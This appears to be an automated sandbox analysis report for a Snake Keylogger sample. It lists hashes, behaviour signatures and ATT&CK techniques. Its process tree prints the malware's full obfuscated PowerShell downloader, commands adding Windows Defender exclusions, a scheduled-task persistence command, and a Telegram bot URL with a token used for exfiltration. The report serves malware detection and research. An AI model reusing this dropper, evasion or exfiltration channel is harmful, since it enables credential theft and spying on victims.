snakekeylogger | 0677bfc48f0007ebc9595793109fd6b7d096c800aa8dfcd1a2736f57896e0b8e

Analysis

max time kernel
118s
max time network
121s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
22-09-2023 13:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mkhg_Zvfw.hta
Size

47KB
MD5

1021b9b4d037fc4076b1e9ab096b2865
SHA1

fe99b870362e9c2494ff5ff871030f9e7c697975
SHA256

0677bfc48f0007ebc9595793109fd6b7d096c800aa8dfcd1a2736f57896e0b8e
SHA512

224ad1edec31f48ebecb4fe54defd7a91f13621de568f1321b3ef92ced2e251fd5506c6d3243fdb4354a55da72bb6bb137fa1611d03995a24d7aca1a70fb470c
SSDEEP

768:s+xarxSyLCcHOJvVxZFGrnath42PZHpkIV0T3ytMQOtW4vrjz9kuxY:jmXHkVxZFKnm22PZHGIV0T3ytM443z94

Score

10^/10

snakekeylogger collection keylogger spyware stealer

Malware Config

Extracted

Family

snakekeylogger

https://api.telegram.org/bot6316392918:AAHcjKTVDupG6SMH3LkXAeVBgHKlqsAcmRU/sendMessage?chat_id=6445748530

Signatures

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 6 IoCs

resource	yara_rule
behavioral1/memory/1048-60-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger
behavioral1/memory/1048-59-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger
behavioral1/memory/1048-63-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger
behavioral1/memory/1048-67-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger
behavioral1/memory/1048-70-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger
behavioral1/memory/1048-72-0x0000000004BC0000-0x0000000004C00000-memory.dmp	family_snakekeylogger

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	1148	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
2624	WXwEfBwFojUL7Eo.exe
1048	WXwEfBwFojUL7Eo.exe

Loads dropped DLL 1 IoCs

pid	Process
1148	powershell.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	WXwEfBwFojUL7Eo.exe
Key opened	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	WXwEfBwFojUL7Eo.exe
Key opened	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	WXwEfBwFojUL7Eo.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	checkip.dyndns.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2624 set thread context of 1048	2624	WXwEfBwFojUL7Eo.exe	41

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
792	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1148	powershell.exe
1148	powershell.exe
1148	powershell.exe
2372	powershell.exe
1240	powershell.exe
1048	WXwEfBwFojUL7Eo.exe
1048	WXwEfBwFojUL7Eo.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1148	powershell.exe
Token: SeDebugPrivilege	2372	powershell.exe
Token: SeDebugPrivilege	1240	powershell.exe
Token: SeDebugPrivilege	1048	WXwEfBwFojUL7Eo.exe

Suspicious use of WriteProcessMemory 29 IoCs

description	pid	Process	procid_target
PID 2180 wrote to memory of 1148	2180	mshta.exe	29
PID 2180 wrote to memory of 1148	2180	mshta.exe	29
PID 2180 wrote to memory of 1148	2180	mshta.exe	29
PID 2180 wrote to memory of 1148	2180	mshta.exe	29
PID 1148 wrote to memory of 2624	1148	powershell.exe	31
PID 1148 wrote to memory of 2624	1148	powershell.exe	31
PID 1148 wrote to memory of 2624	1148	powershell.exe	31
PID 1148 wrote to memory of 2624	1148	powershell.exe	31
PID 2624 wrote to memory of 2372	2624	WXwEfBwFojUL7Eo.exe	35
PID 2624 wrote to memory of 2372	2624	WXwEfBwFojUL7Eo.exe	35
PID 2624 wrote to memory of 2372	2624	WXwEfBwFojUL7Eo.exe	35
PID 2624 wrote to memory of 2372	2624	WXwEfBwFojUL7Eo.exe	35
PID 2624 wrote to memory of 1240	2624	WXwEfBwFojUL7Eo.exe	37
PID 2624 wrote to memory of 1240	2624	WXwEfBwFojUL7Eo.exe	37
PID 2624 wrote to memory of 1240	2624	WXwEfBwFojUL7Eo.exe	37
PID 2624 wrote to memory of 1240	2624	WXwEfBwFojUL7Eo.exe	37
PID 2624 wrote to memory of 792	2624	WXwEfBwFojUL7Eo.exe	40
PID 2624 wrote to memory of 792	2624	WXwEfBwFojUL7Eo.exe	40
PID 2624 wrote to memory of 792	2624	WXwEfBwFojUL7Eo.exe	40
PID 2624 wrote to memory of 792	2624	WXwEfBwFojUL7Eo.exe	40
PID 2624 wrote to memory of 1048	2624	WXwEfBwFojUL7Eo.exe	41
PID 2624 wrote to memory of 1048	2624	WXwEfBwFojUL7Eo.exe	41
PID 2624 wrote to memory of 1048	2624	WXwEfBwFojUL7Eo.exe	41
PID 2624 wrote to memory of 1048	2624	WXwEfBwFojUL7Eo.exe	41
PID 2624 wrote to memory of 1048	2624	WXwEfBwFojUL7Eo.exe	41
PID 2624 wrote to memory of 1048	2624	WXwEfBwFojUL7Eo.exe	41
PID 2624 wrote to memory of 1048	2624	WXwEfBwFojUL7Eo.exe	41
PID 2624 wrote to memory of 1048	2624	WXwEfBwFojUL7Eo.exe	41
PID 2624 wrote to memory of 1048	2624	WXwEfBwFojUL7Eo.exe	41

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	WXwEfBwFojUL7Eo.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	WXwEfBwFojUL7Eo.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\mkhg_Zvfw.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2180
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function uSWqwLZ($cp, $XJ){[IO.File]::WriteAllBytes($cp, $XJ)};function jhyGHN($cp){if($cp.EndsWith((ibgYtJc @(19267,19321,19329,19329))) -eq $True){Start-Process (ibgYtJc @(19335,19338,19331,19321,19329,19329,19272,19271,19267,19322,19341,19322)) $cp}else{Start-Process $cp}};function DHrFVKXC($ga){$s = New-Object (ibgYtJc @(19299,19322,19337,19267,19308,19322,19319,19288,19329,19326,19322,19331,19337));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$XJ = $s.DownloadData($ga);return $XJ};function ibgYtJc($XT){$JP=19221;$Lh=$Null;foreach($x in $XT){$Lh+=[char]($x-$JP)};return $Lh};function urDot(){$rKnrKiotC = $env:APPDATA + '\';$wSHIYk = DHrFVKXC (ibgYtJc @(19325,19337,19337,19333,19279,19268,19268,19270,19276,19278,19267,19273,19272,19267,19270,19276,19275,19267,19273,19271,19268,19328,19338,19320,19326,19268,19308,19309,19340,19290,19323,19287,19340,19291,19332,19327,19306,19297,19276,19290,19332,19267,19322,19341,19322));$QOuJyV = $rKnrKiotC + 'WXwEfBwFojUL7Eo.exe';uSWqwLZ $QOuJyV $wSHIYk;jhyGHN $QOuJyV;;;;}urDot;
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1148
- - C:\Users\Admin\AppData\Roaming\WXwEfBwFojUL7Eo.exe
    "C:\Users\Admin\AppData\Roaming\WXwEfBwFojUL7Eo.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2624
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\WXwEfBwFojUL7Eo.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2372
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\dSirXQFPjw.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1240
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dSirXQFPjw" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF170.tmp"
      4⤵
      Creates scheduled task(s)
      PID:792
  - - C:\Users\Admin\AppData\Roaming\WXwEfBwFojUL7Eo.exe
      "C:\Users\Admin\AppData\Roaming\WXwEfBwFojUL7Eo.exe"
      4⤵
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:1048

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tmpF170.tmp

Filesize
1KB

MD5
284750c5e2465dcf2add7aec42357cdf

SHA1
39fd3f92abc23f660f57c797ebc2e45ef06cfe25

SHA256
5f4a81538c62a70106181ec7fa02f68249d28d1bc9be408133fb7fd8cac5ebdf

SHA512
3cac7afa76e450884bd07acc9bdbf02f42c4bfd4fd928c416bf55d4efd9146189e869f1b9e50572d3b605230d8324f278a62951c1306c9c0f6502b4ad7966118

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4YBDH7IK23RF8W5KGD0K.temp

Filesize
7KB

MD5
8b3b330b872e761cdc17e5471d4a5fbb

SHA1
aa72d07c7c101d78afb97abaa852f49afbebaa5d

SHA256
1148cd72f7069229aea34be85912c64172cbc88744d6326a2659a176568b08fd

SHA512
2144a065600a8a40e1f045290bbf043d0ef90268ce69d6c5ab30a5f3e2d7e87b43054b34278ac8bbb4acafa38601cb2a9123edb5c313bd0d7c301fe8decd95e8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
8b3b330b872e761cdc17e5471d4a5fbb

SHA1
aa72d07c7c101d78afb97abaa852f49afbebaa5d

SHA256
1148cd72f7069229aea34be85912c64172cbc88744d6326a2659a176568b08fd

SHA512
2144a065600a8a40e1f045290bbf043d0ef90268ce69d6c5ab30a5f3e2d7e87b43054b34278ac8bbb4acafa38601cb2a9123edb5c313bd0d7c301fe8decd95e8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
8b3b330b872e761cdc17e5471d4a5fbb

SHA1
aa72d07c7c101d78afb97abaa852f49afbebaa5d

SHA256
1148cd72f7069229aea34be85912c64172cbc88744d6326a2659a176568b08fd

SHA512
2144a065600a8a40e1f045290bbf043d0ef90268ce69d6c5ab30a5f3e2d7e87b43054b34278ac8bbb4acafa38601cb2a9123edb5c313bd0d7c301fe8decd95e8

Download Submit
C:\Users\Admin\AppData\Roaming\WXwEfBwFojUL7Eo.exe

Filesize
542KB

MD5
fb6436801517f4cb1748ba4bf9df2df4

SHA1
2c36e323268892dc7f9987fb5200ee1fb2336df0

SHA256
f8e42f0b33b357352164af46809b4ba2fd3f213059b4f7d1a38c9df1e84e6b12

SHA512
77140f0e92be4f7b931f33949ef4640b8d02bebcc43e0aec97618eb731efb07acb0648efcc10af630f2440bc2c8fa45b3862b8d77ce5c3f9d908ac9b22bf6977

Download Submit
C:\Users\Admin\AppData\Roaming\WXwEfBwFojUL7Eo.exe

Filesize
542KB

MD5
fb6436801517f4cb1748ba4bf9df2df4

SHA1
2c36e323268892dc7f9987fb5200ee1fb2336df0

SHA256
f8e42f0b33b357352164af46809b4ba2fd3f213059b4f7d1a38c9df1e84e6b12

SHA512
77140f0e92be4f7b931f33949ef4640b8d02bebcc43e0aec97618eb731efb07acb0648efcc10af630f2440bc2c8fa45b3862b8d77ce5c3f9d908ac9b22bf6977

Download Submit
C:\Users\Admin\AppData\Roaming\WXwEfBwFojUL7Eo.exe

Filesize
542KB

MD5
fb6436801517f4cb1748ba4bf9df2df4

SHA1
2c36e323268892dc7f9987fb5200ee1fb2336df0

SHA256
f8e42f0b33b357352164af46809b4ba2fd3f213059b4f7d1a38c9df1e84e6b12

SHA512
77140f0e92be4f7b931f33949ef4640b8d02bebcc43e0aec97618eb731efb07acb0648efcc10af630f2440bc2c8fa45b3862b8d77ce5c3f9d908ac9b22bf6977

Download Submit
C:\Users\Admin\AppData\Roaming\dSirXQFPjw.exe

Filesize
542KB

MD5
fb6436801517f4cb1748ba4bf9df2df4

SHA1
2c36e323268892dc7f9987fb5200ee1fb2336df0

SHA256
f8e42f0b33b357352164af46809b4ba2fd3f213059b4f7d1a38c9df1e84e6b12

SHA512
77140f0e92be4f7b931f33949ef4640b8d02bebcc43e0aec97618eb731efb07acb0648efcc10af630f2440bc2c8fa45b3862b8d77ce5c3f9d908ac9b22bf6977

Download Submit
\Users\Admin\AppData\Roaming\WXwEfBwFojUL7Eo.exe

Filesize
542KB

MD5
fb6436801517f4cb1748ba4bf9df2df4

SHA1
2c36e323268892dc7f9987fb5200ee1fb2336df0

SHA256
f8e42f0b33b357352164af46809b4ba2fd3f213059b4f7d1a38c9df1e84e6b12

SHA512
77140f0e92be4f7b931f33949ef4640b8d02bebcc43e0aec97618eb731efb07acb0648efcc10af630f2440bc2c8fa45b3862b8d77ce5c3f9d908ac9b22bf6977

Download Submit
memory/1048-67-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/1048-61-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1048-72-0x0000000004BC0000-0x0000000004C00000-memory.dmp

Filesize
256KB

Download
memory/1048-71-0x0000000074830000-0x0000000074F1E000-memory.dmp

Filesize
6.9MB

Download
memory/1048-70-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/1048-56-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/1048-60-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/1048-63-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/1048-74-0x0000000004BC0000-0x0000000004C00000-memory.dmp

Filesize
256KB

Download
memory/1048-73-0x0000000074830000-0x0000000074F1E000-memory.dmp

Filesize
6.9MB

Download
memory/1048-59-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/1048-58-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/1148-3-0x0000000072C10000-0x00000000731BB000-memory.dmp

Filesize
5.7MB

Download
memory/1148-2-0x0000000072C10000-0x00000000731BB000-memory.dmp

Filesize
5.7MB

Download
memory/1148-5-0x00000000026C0000-0x0000000002700000-memory.dmp

Filesize
256KB

Download
memory/1148-6-0x00000000026C0000-0x0000000002700000-memory.dmp

Filesize
256KB

Download
memory/1148-14-0x0000000072C10000-0x00000000731BB000-memory.dmp

Filesize
5.7MB

Download
memory/1148-4-0x00000000026C0000-0x0000000002700000-memory.dmp

Filesize
256KB

Download
memory/1240-66-0x0000000070310000-0x00000000708BB000-memory.dmp

Filesize
5.7MB

Download
memory/1240-52-0x0000000070310000-0x00000000708BB000-memory.dmp

Filesize
5.7MB

Download
memory/1240-53-0x0000000070310000-0x00000000708BB000-memory.dmp

Filesize
5.7MB

Download
memory/2372-44-0x0000000070310000-0x00000000708BB000-memory.dmp

Filesize
5.7MB

Download
memory/2372-55-0x0000000070310000-0x00000000708BB000-memory.dmp

Filesize
5.7MB

Download
memory/2372-46-0x0000000002680000-0x00000000026C0000-memory.dmp

Filesize
256KB

Download
memory/2372-45-0x0000000002680000-0x00000000026C0000-memory.dmp

Filesize
256KB

Download
memory/2372-43-0x0000000002680000-0x00000000026C0000-memory.dmp

Filesize
256KB

Download
memory/2372-42-0x0000000070310000-0x00000000708BB000-memory.dmp

Filesize
5.7MB

Download
memory/2624-32-0x0000000007DB0000-0x0000000007E10000-memory.dmp

Filesize
384KB

Download
memory/2624-31-0x00000000004A0000-0x00000000004AC000-memory.dmp

Filesize
48KB

Download
memory/2624-30-0x0000000000480000-0x000000000048A000-memory.dmp

Filesize
40KB

Download
memory/2624-68-0x000000006F800000-0x000000006FEEE000-memory.dmp

Filesize
6.9MB

Download
memory/2624-29-0x0000000000420000-0x0000000000460000-memory.dmp

Filesize
256KB

Download
memory/2624-28-0x000000006F800000-0x000000006FEEE000-memory.dmp

Filesize
6.9MB

Download
memory/2624-27-0x0000000000460000-0x000000000047A000-memory.dmp

Filesize
104KB

Download
memory/2624-26-0x0000000000420000-0x0000000000460000-memory.dmp

Filesize
256KB

Download
memory/2624-23-0x000000006F800000-0x000000006FEEE000-memory.dmp

Filesize
6.9MB

Download
memory/2624-15-0x00000000001E0000-0x000000000026E000-memory.dmp

Filesize
568KB

Download